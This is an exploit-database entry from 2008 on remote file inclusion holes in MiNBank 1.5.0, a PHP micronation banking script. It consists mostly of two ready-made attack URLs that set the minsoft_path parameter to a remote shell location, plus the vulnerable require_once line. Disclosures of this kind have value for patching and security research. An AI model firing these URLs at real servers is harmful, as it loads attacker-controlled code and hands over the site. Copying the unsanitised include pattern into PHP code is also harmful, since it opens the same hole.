MiNBank 1.5.0 - Multiple Remote File Inclusions

Author: DaRkLiFe
type: webapps
platform: php
port: 
date_added: 2008-09-29 
date_updated: 2016-12-23 
verified: 1 
codes: OSVDB-51758;CVE-2008-6006;OSVDB-51757 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comminba_v0150.zip

**************************************************************************************

Author : By DaRkLiFe
Greetz : str0ke & S.VV.A.T.

**************************************************************************************
Script   :
Micronation Banking System(minba) 1.5.0
Remote File Inclusion Vulnerability(s)

Download:
http://downloads.sourceforge.net/minbank/minba_v0150.zip?modtime=1169500084&big_mirror=0

**************************************************************************************

Exploit : http://site.com/minba/utility/utdb_access.php?minsoft_path=Shellz?


http://site.com/minba/utility/utgn_message.php?minsoft_path=Shellz?

**************************************************************************************

In Multiple files the vulnerability exists.

I have posted two examples

Vulberable : line 3 : require_once("$minsoft_path/utility/utgn_config.php");
in minba/utility/utgn_message.php file


**************************************************************************************

THANKS ! GREETZ !
**************************************************************************************

# milw0rm.com [2008-09-30]